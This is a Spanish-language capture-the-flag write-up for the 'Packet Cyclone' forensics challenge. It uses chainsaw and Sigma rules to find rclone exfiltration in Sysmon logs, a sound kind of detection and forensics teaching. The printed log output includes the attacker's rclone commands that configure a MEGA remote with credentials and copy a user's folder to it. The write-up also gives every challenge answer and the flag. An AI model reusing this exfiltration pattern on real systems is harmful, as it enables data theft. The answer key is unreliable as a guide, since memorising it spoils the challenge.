Packet Cyclone
11 minutos de lectura
Tenemos esta descripción del reto:
Pandora’s friend and partner, Wade, is the one that leads the investigation into the relic’s location. Recently, he noticed some weird traffic coming from his host. That led him to believe that his host was compromised. After a quick investigation, his fear was confirmed. Pandora tries now to see if the attacker caused the suspicious traffic during the exfiltration phase. Pandora believes that the malicious actor used rclone to exfiltrate Wade’s research to the cloud. Using the tool called “chainsaw” and the sigma rules provided, can you detect the usage of rclone from the event logs produced by Sysmon? To get the flag, you need to start and connect to the docker service and answer all the questions correctly.
Y se nos proporcionan estos archivos:
$ tree
.
├── Logs
│ ├── Application.evtx
│ ├── HardwareEvents.evtx
│ ├── Internet Explorer.evtx
│ ├── Key Management Service.evtx
│ ├── Microsoft-Client-Licensing-Platform%4Admin.evtx
│ ├── Microsoft-Windows-AAD%4Operational.evtx
│ ├── Microsoft-Windows-AppModel-Runtime%4Admin.evtx
│ ├── Microsoft-Windows-AppReadiness%4Admin.evtx
│ ├── Microsoft-Windows-AppReadiness%4Operational.evtx
│ ├── Microsoft-Windows-AppXDeployment%4Operational.evtx
│ ├── Microsoft-Windows-AppXDeploymentServer%4Operational.evtx
│ ├── Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx
│ ├── Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx
│ ├── Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx
│ ├── Microsoft-Windows-Application-Experience%4Program-Inventory.evtx
│ ├── Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx
│ ├── Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx
│ ├── Microsoft-Windows-AppxPackaging%4Operational.evtx
│ ├── Microsoft-Windows-Audio%4CaptureMonitor.evtx
│ ├── Microsoft-Windows-Audio%4Operational.evtx
│ ├── Microsoft-Windows-Audio%4PlaybackManager.evtx
│ ├── Microsoft-Windows-Authentication User Interface%4Operational.evtx
│ ├── Microsoft-Windows-Biometrics%4Operational.evtx
│ ├── Microsoft-Windows-BitLocker%4BitLocker Management.evtx
│ ├── Microsoft-Windows-Bits-Client%4Operational.evtx
│ ├── Microsoft-Windows-CloudStore%4Operational.evtx
│ ├── Microsoft-Windows-CodeIntegrity%4Operational.evtx
│ ├── Microsoft-Windows-Containers-BindFlt%4Operational.evtx
│ ├── Microsoft-Windows-Containers-Wcifs%4Operational.evtx
│ ├── Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx
│ ├── Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx
│ ├── Microsoft-Windows-Crypto-DPAPI%4Operational.evtx
│ ├── Microsoft-Windows-Crypto-NCrypt%4Operational.evtx
│ ├── Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx
│ ├── Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Operational.evtx
│ ├── Microsoft-Windows-DeviceSetupManager%4Admin.evtx
│ ├── Microsoft-Windows-DeviceSetupManager%4Operational.evtx
│ ├── Microsoft-Windows-Dhcp-Client%4Admin.evtx
│ ├── Microsoft-Windows-Dhcpv6-Client%4Admin.evtx
│ ├── Microsoft-Windows-Diagnosis-DPS%4Operational.evtx
│ ├── Microsoft-Windows-Diagnosis-PLA%4Operational.evtx
│ ├── Microsoft-Windows-Diagnosis-Scripted%4Admin.evtx
│ ├── Microsoft-Windows-Diagnosis-Scripted%4Operational.evtx
│ ├── Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx
│ ├── Microsoft-Windows-Diagnostics-Performance%4Operational.evtx
│ ├── Microsoft-Windows-DiskDiagnosticDataCollector%4Operational.evtx
│ ├── Microsoft-Windows-FileHistory-Core%4WHC.evtx
│ ├── Microsoft-Windows-GroupPolicy%4Operational.evtx
│ ├── Microsoft-Windows-HelloForBusiness%4Operational.evtx
│ ├── Microsoft-Windows-HotspotAuth%4Operational.evtx
│ ├── Microsoft-Windows-IKE%4Operational.evtx
│ ├── Microsoft-Windows-Kernel-Boot%4Operational.evtx
│ ├── Microsoft-Windows-Kernel-EventTracing%4Admin.evtx
│ ├── Microsoft-Windows-Kernel-PnP%4Configuration.evtx
│ ├── Microsoft-Windows-Kernel-PnP%4Driver Watchdog.evtx
│ ├── Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx
│ ├── Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx
│ ├── Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx
│ ├── Microsoft-Windows-Kernel-WHEA%4Errors.evtx
│ ├── Microsoft-Windows-Kernel-WHEA%4Operational.evtx
│ ├── Microsoft-Windows-Known Folders API Service.evtx
│ ├── Microsoft-Windows-LanguagePackSetup%4Operational.evtx
│ ├── Microsoft-Windows-LiveId%4Operational.evtx
│ ├── Microsoft-Windows-MUI%4Admin.evtx
│ ├── Microsoft-Windows-MUI%4Operational.evtx
│ ├── Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4Admin.evtx
│ ├── Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4Autopilot.evtx
│ ├── Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4ManagementService.evtx
│ ├── Microsoft-Windows-NCSI%4Operational.evtx
│ ├── Microsoft-Windows-NetworkProfile%4Operational.evtx
│ ├── Microsoft-Windows-Ntfs%4Operational.evtx
│ ├── Microsoft-Windows-Ntfs%4WHC.evtx
│ ├── Microsoft-Windows-Partition%4Diagnostic.evtx
│ ├── Microsoft-Windows-PowerShell%4Admin.evtx
│ ├── Microsoft-Windows-PowerShell%4Operational.evtx
│ ├── Microsoft-Windows-Privacy-Auditing%4Operational.evtx
│ ├── Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx
│ ├── Microsoft-Windows-Provisioning-Diagnostics-Provider%4Admin.evtx
│ ├── Microsoft-Windows-Provisioning-Diagnostics-Provider%4AutoPilot.evtx
│ ├── Microsoft-Windows-Provisioning-Diagnostics-Provider%4ManagementService.evtx
│ ├── Microsoft-Windows-PushNotification-Platform%4Admin.evtx
│ ├── Microsoft-Windows-PushNotification-Platform%4Operational.evtx
│ ├── Microsoft-Windows-ReadyBoost%4Operational.evtx
│ ├── Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx
│ ├── Microsoft-Windows-RestartManager%4Operational.evtx
│ ├── Microsoft-Windows-SMBClient%4Operational.evtx
│ ├── Microsoft-Windows-SMBServer%4Audit.evtx
│ ├── Microsoft-Windows-SMBServer%4Connectivity.evtx
│ ├── Microsoft-Windows-SMBServer%4Operational.evtx
│ ├── Microsoft-Windows-SMBServer%4Security.evtx
│ ├── Microsoft-Windows-Security-Mitigations%4KernelMode.evtx
│ ├── Microsoft-Windows-Security-Mitigations%4UserMode.evtx
│ ├── Microsoft-Windows-Security-SPP-UX-Notifications%4ActionCenter.evtx
│ ├── Microsoft-Windows-SettingSync%4Debug.evtx
│ ├── Microsoft-Windows-SettingSync%4Operational.evtx
│ ├── Microsoft-Windows-Shell-ConnectedAccountState%4ActionCenter.evtx
│ ├── Microsoft-Windows-Shell-Core%4ActionCenter.evtx
│ ├── Microsoft-Windows-Shell-Core%4AppDefaults.evtx
│ ├── Microsoft-Windows-Shell-Core%4LogonTasksChannel.evtx
│ ├── Microsoft-Windows-Shell-Core%4Operational.evtx
│ ├── Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx
│ ├── Microsoft-Windows-SmbClient%4Audit.evtx
│ ├── Microsoft-Windows-SmbClient%4Connectivity.evtx
│ ├── Microsoft-Windows-SmbClient%4Security.evtx
│ ├── Microsoft-Windows-StateRepository%4Operational.evtx
│ ├── Microsoft-Windows-StateRepository%4Restricted.evtx
│ ├── Microsoft-Windows-Storage-Storport%4Health.evtx
│ ├── Microsoft-Windows-Storage-Storport%4Operational.evtx
│ ├── Microsoft-Windows-StorageSpaces-Driver%4Diagnostic.evtx
│ ├── Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx
│ ├── Microsoft-Windows-StorageSpaces-ManagementAgent%4WHC.evtx
│ ├── Microsoft-Windows-Store%4Operational.evtx
│ ├── Microsoft-Windows-Storsvc%4Diagnostic.evtx
│ ├── Microsoft-Windows-Sysmon%4Operational.evtx
│ ├── Microsoft-Windows-TWinUI%4Operational.evtx
│ ├── Microsoft-Windows-TZSync%4Operational.evtx
│ ├── Microsoft-Windows-TaskScheduler%4Maintenance.evtx
│ ├── Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx
│ ├── Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx
│ ├── Microsoft-Windows-Time-Service%4Operational.evtx
│ ├── Microsoft-Windows-UAC%4Operational.evtx
│ ├── Microsoft-Windows-UniversalTelemetryClient%4Operational.evtx
│ ├── Microsoft-Windows-User Device Registration%4Admin.evtx
│ ├── Microsoft-Windows-User Profile Service%4Operational.evtx
│ ├── Microsoft-Windows-UserPnp%4ActionCenter.evtx
│ ├── Microsoft-Windows-UserPnp%4DeviceInstall.evtx
│ ├── Microsoft-Windows-VPN%4Operational.evtx
│ ├── Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx
│ ├── Microsoft-Windows-WER-PayloadHealth%4Operational.evtx
│ ├── Microsoft-Windows-WFP%4Operational.evtx
│ ├── Microsoft-Windows-WMI-Activity%4Operational.evtx
│ ├── Microsoft-Windows-Wcmsvc%4Operational.evtx
│ ├── Microsoft-Windows-WebAuthN%4Operational.evtx
│ ├── Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx
│ ├── Microsoft-Windows-WinRM%4Operational.evtx
│ ├── Microsoft-Windows-Windows Defender%4Operational.evtx
│ ├── Microsoft-Windows-Windows Defender%4WHC.evtx
│ ├── Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx
│ ├── Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx
│ ├── Microsoft-Windows-Windows Firewall With Advanced Security%4FirewallDiagnostics.evtx
│ ├── Microsoft-Windows-WindowsBackup%4ActionCenter.evtx
│ ├── Microsoft-Windows-WindowsSystemAssessmentTool%4Operational.evtx
│ ├── Microsoft-Windows-WindowsUpdateClient%4Operational.evtx
│ ├── Microsoft-Windows-Winlogon%4Operational.evtx
│ ├── Microsoft-Windows-WorkFolders%4WHC.evtx
│ ├── Security.evtx
│ ├── Setup.evtx
│ ├── System.evtx
│ └── Windows PowerShell.evtx
└── sigma_rules
├── rclone_config_creation.yaml
└── rclone_execution.yaml
3 directories, 151 files
Comprendiendo el reto
El reto está relacionado con Rclone, que es una herramienta para administrar archivos en la nube. Se nos proporcionan muchos archivos EVTX que representan logs de eventos de Windows. Además, tenemos algunas reglas Sigma, que son un formato de firma genérico y abierto que permite describir eventos de logs relevantes de una manera directa.
La descripción del reto menciona chainsaw. Esta herramienta toma los archivos EVTX de Windows y las reglas Sigma para descubrir indicadores de compromiso (IoC).
Indicadores de compromiso
Vamos a ejecutar chainsaw:
$ wget -q https://github.com/WithSecureLabs/chainsaw/releases/download/v2.6.0/chainsaw_x86_64-unknown-linux-gnu.tar.gz
$ tar xvfz chainsaw_x86_64-unknown-linux-gnu.tar.gz
x chainsaw/LICENCE
x chainsaw/README.md
x chainsaw/chainsaw
x chainsaw/mappings/
x chainsaw/mappings/sigma-event-logs-all.yml
x chainsaw/mappings/sigma-mft-logs-all.yml
x chainsaw/mappings/sigma-event-logs-legacy.yml
$ ./chainsaw/chainsaw
Rapidly work with Forensic Artefacts
Usage: chainsaw [OPTIONS] <COMMAND>
Commands:
dump Dump an artefact into a different format
hunt Hunt through artefacts using detection rules for threat detection
lint Lint provided rules to ensure that they load correctly
search Search through forensic artefacts for keywords
analyse Perform various analyses on artifacts
help Print this message or the help of the given subcommand(s)
Options:
--no-banner Hide Chainsaw's banner
--num-threads <NUM_THREADS> Limit the thread number (default: num of CPUs)
-h, --help Print help
-V, --version Print version
Examples:
Hunt with Sigma and Chainsaw Rules:
./chainsaw hunt evtx_attack_samples/ -s sigma/ --mapping mappings/sigma-event-logs-all.yml -r rules/
Hunt with Sigma rules and output in JSON:
./chainsaw hunt evtx_attack_samples/ -s sigma/ --mapping mappings/sigma-event-logs-all.yml --json
Search for the case-insensitive word 'mimikatz':
./chainsaw search mimikatz -i evtx_attack_samples/
Search for Powershell Script Block Events (EventID 4014):
./chainsaw search -t 'Event.System.EventID: =4104' evtx_attack_samples/
$ ./chainsaw/chainsaw hunt --sigma sigma_rules/ --mapping chainsaw/mappings/sigma-event-logs-all.yml Logs/
██████╗██╗ ██╗ █████╗ ██╗███╗ ██╗███████╗ █████╗ ██╗ ██╗
██╔════╝██║ ██║██╔══██╗██║████╗ ██║██╔════╝██╔══██╗██║ ██║
██║ ███████║███████║██║██╔██╗ ██║███████╗███████║██║ █╗ ██║
██║ ██╔══██║██╔══██║██║██║╚██╗██║╚════██║██╔══██║██║███╗██║
╚██████╗██║ ██║██║ ██║██║██║ ╚████║███████║██║ ██║╚███╔███╔╝
╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝ ╚══╝╚══╝
By Countercept (@FranticTyping, @AlexKornitzer)
[+] Loading detection rules from: sigma_rules/
[+] Loaded 2 detection rules
[+] Loading forensic artefacts from: Logs/ (extensions: .evtx, .evt)
[+] Loaded 149 forensic artefacts (54.3 MB)
[+] Hunting: [========================================] 149/149
[+] Group: Sigma
┌─────────────────────┬────────────────────────────┬───────┬──────────────────────────┬──────────┬───────────┬─────────────────┬────────────────────────────────┐
│ timestamp │ detections │ count │ Event.System.Provider │ Event ID │ Record ID │ Computer │ Event Data │
├─────────────────────┼────────────────────────────┼───────┼──────────────────────────┼──────────┼───────────┼─────────────────┼────────────────────────────────┤
│ 2023-02-24 15:35:07 │ ‣ Rclone Execution via │ 1 │ Microsoft-Windows-Sysmon │ 1 │ 76 │ DESKTOP-UTDHED2 │ CommandLine: '"C:\Users\wade\A │
│ │ Command Line or PowerShell │ │ │ │ │ │ ppData\Local\Temp\rclone-v1.61 │
│ │ │ │ │ │ │ │ .1-windows-amd64\rclone.exe" c │
│ │ │ │ │ │ │ │ onfig create remote mega user │
│ │ │ │ │ │ │ │ majmeret@protonmail.com pass F │
│ │ │ │ │ │ │ │ BMeavdiaFZbWzpMqIVhJCGXZ5XXZI1 │
│ │ │ │ │ │ │ │ qsU3EjhoKQw0rEoQqHyI' │
│ │ │ │ │ │ │ │ Company: https://rclone.org │
│ │ │ │ │ │ │ │ CurrentDirectory: C:\Users\wad │
│ │ │ │ │ │ │ │ e\AppData\Local\Temp\rclone-v1 │
│ │ │ │ │ │ │ │ .61.1-windows-amd64\ │
│ │ │ │ │ │ │ │ Description: Rsync for cloud s │
│ │ │ │ │ │ │ │ torage │
│ │ │ │ │ │ │ │ FileVersion: 1.61.1 │
│ │ │ │ │ │ │ │ Hashes: SHA256=E94901809FF7CC5 │
│ │ │ │ │ │ │ │ 168C1E857D4AC9CBB339CA1F6E21DC │
│ │ │ │ │ │ │ │ CE95DFB8E28DF799961 │
│ │ │ │ │ │ │ │ Image: C:\Users\wade\AppData\L │
│ │ │ │ │ │ │ │ ocal\Temp\rclone-v1.61.1-windo │
│ │ │ │ │ │ │ │ ws-amd64\rclone.exe │
│ │ │ │ │ │ │ │ IntegrityLevel: Medium │
│ │ │ │ │ │ │ │ LogonGuid: 10DA3E43-D892-63F8- │
│ │ │ │ │ │ │ │ 4B6D-030000000000 │
│ │ │ │ │ │ │ │ LogonId: '0x36d4b' │
│ │ │ │ │ │ │ │ OriginalFileName: rclone.exe │
│ │ │ │ │ │ │ │ ParentCommandLine: '"C:\Window │
│ │ │ │ │ │ │ │ s\System32\WindowsPowerShell\v │
│ │ │ │ │ │ │ │ 1.0\powershell.exe" ' │
│ │ │ │ │ │ │ │ ParentImage: C:\Windows\System │
│ │ │ │ │ │ │ │ 32\WindowsPowerShell\v1.0\powe │
│ │ │ │ │ │ │ │ rshell.exe │
│ │ │ │ │ │ │ │ ParentProcessGuid: 10DA3E43-D8 │
│ │ │ │ │ │ │ │ D2-63F8-9B00-000000000900 │
│ │ │ │ │ │ │ │ ParentProcessId: 5888 │
│ │ │ │ │ │ │ │ ParentUser: DESKTOP-UTDHED2\wa │
│ │ │ │ │ │ │ │ de │
│ │ │ │ │ │ │ │ ProcessGuid: 10DA3E43-D92B-63F │
│ │ │ │ │ │ │ │ 8-B100-000000000900 │
│ │ │ │ │ │ │ │ ProcessId: 3820 │
│ │ │ │ │ │ │ │ Product: Rclone │
│ │ │ │ │ │ │ │ RuleName: '-' │
│ │ │ │ │ │ │ │ TerminalSessionId: 1 │
│ │ │ │ │ │ │ │ User: DESKTOP-UTDHED2\wade │
│ │ │ │ │ │ │ │ UtcTime: 2023-02-24 15:35:07.3 │
│ │ │ │ │ │ │ │ 36 │
├─────────────────────┼────────────────────────────┼───────┼──────────────────────────┼──────────┼───────────┼─────────────────┼────────────────────────────────┤
│ 2023-02-24 15:35:17 │ ‣ Rclone Execution via │ 1 │ Microsoft-Windows-Sysmon │ 1 │ 78 │ DESKTOP-UTDHED2 │ CommandLine: '"C:\Users\wade\A │
│ │ Command Line or PowerShell │ │ │ │ │ │ ppData\Local\Temp\rclone-v1.61 │
│ │ │ │ │ │ │ │ .1-windows-amd64\rclone.exe" c │
│ │ │ │ │ │ │ │ opy C:\Users\Wade\Desktop\Reli │
│ │ │ │ │ │ │ │ c_location\ remote:exfiltratio │
│ │ │ │ │ │ │ │ n -v' │
│ │ │ │ │ │ │ │ Company: https://rclone.org │
│ │ │ │ │ │ │ │ CurrentDirectory: C:\Users\wad │
│ │ │ │ │ │ │ │ e\AppData\Local\Temp\rclone-v1 │
│ │ │ │ │ │ │ │ .61.1-windows-amd64\ │
│ │ │ │ │ │ │ │ Description: Rsync for cloud s │
│ │ │ │ │ │ │ │ torage │
│ │ │ │ │ │ │ │ FileVersion: 1.61.1 │
│ │ │ │ │ │ │ │ Hashes: SHA256=E94901809FF7CC5 │
│ │ │ │ │ │ │ │ 168C1E857D4AC9CBB339CA1F6E21DC │
│ │ │ │ │ │ │ │ CE95DFB8E28DF799961 │
│ │ │ │ │ │ │ │ Image: C:\Users\wade\AppData\L │
│ │ │ │ │ │ │ │ ocal\Temp\rclone-v1.61.1-windo │
│ │ │ │ │ │ │ │ ws-amd64\rclone.exe │
│ │ │ │ │ │ │ │ IntegrityLevel: Medium │
│ │ │ │ │ │ │ │ LogonGuid: 10DA3E43-D892-63F8- │
│ │ │ │ │ │ │ │ 4B6D-030000000000 │
│ │ │ │ │ │ │ │ LogonId: '0x36d4b' │
│ │ │ │ │ │ │ │ OriginalFileName: rclone.exe │
│ │ │ │ │ │ │ │ ParentCommandLine: '"C:\Window │
│ │ │ │ │ │ │ │ s\System32\WindowsPowerShell\v │
│ │ │ │ │ │ │ │ 1.0\powershell.exe" ' │
│ │ │ │ │ │ │ │ ParentImage: C:\Windows\System │
│ │ │ │ │ │ │ │ 32\WindowsPowerShell\v1.0\powe │
│ │ │ │ │ │ │ │ rshell.exe │
│ │ │ │ │ │ │ │ ParentProcessGuid: 10DA3E43-D8 │
│ │ │ │ │ │ │ │ D2-63F8-9B00-000000000900 │
│ │ │ │ │ │ │ │ ParentProcessId: 5888 │
│ │ │ │ │ │ │ │ ParentUser: DESKTOP-UTDHED2\wa │
│ │ │ │ │ │ │ │ de │
│ │ │ │ │ │ │ │ ProcessGuid: 10DA3E43-D935-63F │
│ │ │ │ │ │ │ │ 8-B200-000000000900 │
│ │ │ │ │ │ │ │ ProcessId: 5116 │
│ │ │ │ │ │ │ │ Product: Rclone │
│ │ │ │ │ │ │ │ RuleName: '-' │
│ │ │ │ │ │ │ │ TerminalSessionId: 1 │
│ │ │ │ │ │ │ │ User: DESKTOP-UTDHED2\wade │
│ │ │ │ │ │ │ │ UtcTime: 2023-02-24 15:35:17.5 │
│ │ │ │ │ │ │ │ 16 │
└─────────────────────┴────────────────────────────┴───────┴──────────────────────────┴──────────┴───────────┴─────────────────┴────────────────────────────────┘
[+] 2 Detections found on 2 documents
Solución
Ahora podemos conectarnos a la instancia remota y responder a las preguntas (toda la información necesaria aparece en la tabla anterior):
$ nc 157.245.38.221 32724
+----------------+-------------------------------------------------------------------------------+
| Title | Description |
+----------------+-------------------------------------------------------------------------------+
| Packet Cyclone | Pandora's friend and partner, Wade, is the one that leads |
| | the investigation into the relic's location. |
| | Recently, he noticed some weird traffic coming from his host. |
| | That led him to believe that his host was compromised. |
| | After a quick investigation, his fear was confirmed. Pandora tries now to see |
| | if the attacker caused the suspicious traffic during the exfiltration phase. |
| | Pandora believes that the malicious actor used rclone |
| | to exfiltrate Wade's research to the cloud. |
| | Using the tool chainsaw and many sigma rules that can be found online, |
| | can you detect the usage of rclone from the event logs produced by Sysmon? |
| | To get the flag, you need to start and connect |
| | to the docker service and answer all the questions correctly. |
+----------------+-------------------------------------------------------------------------------+
What is the email of the attacker used for the exfiltration process? (for example: name@email.com)
> majmeret@protonmail.com
[+] Correct!
What is the password of the attacker used for the exfiltration process? (for example: password123)
> FBMeavdiaFZbWzpMqIVhJCGXZ5XXZI1qsU3EjhoKQw0rEoQqHyI
[+] Correct!
What is the Cloud storage provider used by the attacker? (for example: cloud)
> mega
[+] Correct!
What is the ID of the process used by the attackers to configure their tool? (for example: 1337)
> 3820
[+] Correct!
What is the name of the folder the attacker exfiltrated; provide the full path. (for example: C:\Users\user\folder)
> C:\Users\Wade\Desktop\Relic_location
[+] Correct!
What is the name of the folder the attacker exfiltrated the files to? (for example: exfil_folder)
> exfiltration
[+] Correct!
Flag
Y aquí esta la flag:
[+] Here is the flag: HTB{Rcl0n3_1s_n0t_s0_inn0c3nt_4ft3r_4ll}